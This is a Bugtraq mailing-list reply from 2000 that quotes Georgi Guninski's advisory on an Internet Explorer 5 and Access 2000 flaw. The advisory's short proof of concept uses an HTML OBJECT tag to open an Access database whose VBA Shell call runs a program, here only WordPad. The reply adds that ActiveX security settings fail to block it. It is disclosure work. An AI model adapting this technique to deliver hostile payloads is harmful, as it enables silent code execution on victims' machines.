Re: IE 5 and Access 2000 vulnerability - executing programs

[paul.rogers () MIS-CDS COM (Paul Rogers)]

And as an extra point to this alert, if you have the security option "Run
ActiveX controls and plug-ins" set to prompt or disable, the code will STILL
execute.

If you have this option set to prompt, the dialog box will appear after the
OBJECT tag has been executed and if you have this option set to disable, the
warning dialog box will again appear after the OBJECT tag has been executed.

Haven't tested this with PP2000 and Excel 2000 yet (I will do in a tick),
but I assume the same bug will occur.

Cheers,

Paul Rogers,
Network Security Analyst.

MIS Corporate Defence Solutions Limited

Tel:            +44 (0)1622 723422 (Direct Line)
                +44 (0)1622 723400 (Switchboard)
Fax:            +44 (0)1622 728580
Website:        http://www.mis-cds.com/

> -----Original Message-----
> From: Georgi Guninski [mailto:joro () NAT BG]
> Sent: 27 June 2000 12:43
> To: BUGTRAQ () SECURITYFOCUS COM
> Subject: IE 5 and Access 2000 vulnerability - executing programs
>
>
> Georgi Guninski security advisory #14, 2000
>
> IE 5 and Access 2000 vulnerability - executing programs
>
> Systems affected: IE 5.01, Access 2000, Win98 - probably
> other versions,
> have not tested
> Risk: High
>
> Disclaimer:
> The opinions expressed in this advisory and program are my own and not
> of any company.
> The usual standard disclaimer applies, especially the fact that Georgi
> Guninski is not liable for any damages caused by direct or
> indirect use
> of the information or functionality provided by this program.
> Georgi Guninski, bears NO responsibility for content or misuse of this
> program or any derivatives thereof.
>
> Description:
> Internet Explorer 5.01 and Access 2000 under Windows 98 (suppose other
> versions are also vulnerable)
> allow executing programs when viewing a web page or HTML
> email message -
> (in the latter case with IFRAME).
> This allows taking full control over user's computer.
>
> Details:
>
> Access 2000 allows executing VBA code which has access to system
> resources and in particular executing files.
> It is possible to silently open and execute .mdb file from IE with the
> code:
> <OBJECT data="db3.mdb" id="d1"></OBJECT>
> This allows executing VBA code from Access 2000, though it is not
> visible to the user.
>
> The code is:
> -----------access.html----------------------------
> <OBJECT data="db3.mdb" id="d1"></OBJECT>
> -----------in Form1 of db3.mdb---------------------
> Private Sub Form_Load()
> On Error GoTo Err_Command0_Click
>     Dim stAppName As String
>     stAppName = "C:\Program Files\Accessories\wordpad.exe"
>     MsgBox ("Trying to start: " & stAppName)
>     Call Shell(stAppName, 1)
>
> Exit_Command0_Click:
>     Exit Sub
>
> Err_Command0_Click:
>     MsgBox Err.Description
>     Resume Exit_Command0_Click
> End Sub
> ---------------------------------------------------
> Form1 is automatically opened at database startup.
>
> Demonstration is available at:
> http://www.nat.bg/~joro/access.html
>
>
> Copyright 2000 Georgi Guninski
>
> Regards,
> Georgi Guninski
> http://www.nat.bg/~joro

**********************************************************************
The information contained in this message or any of its attachments may be privileged and confidential and intended for 
the exclusive use of the addressee. If you are not the addressee any disclosure, reproduction, distribution or other 
dissemination or use of this communication is strictly prohibited.

The views expressed in this e-mail are those of the individual and not necessary of MIS Corporate Defense Solutions 
Ltd. Any prices quoted are only valid if followed up by a formal written quote.

If you have received this transmission in error, please contact our Security Manager on 44 (0) 1622 723400.
**********************************************************************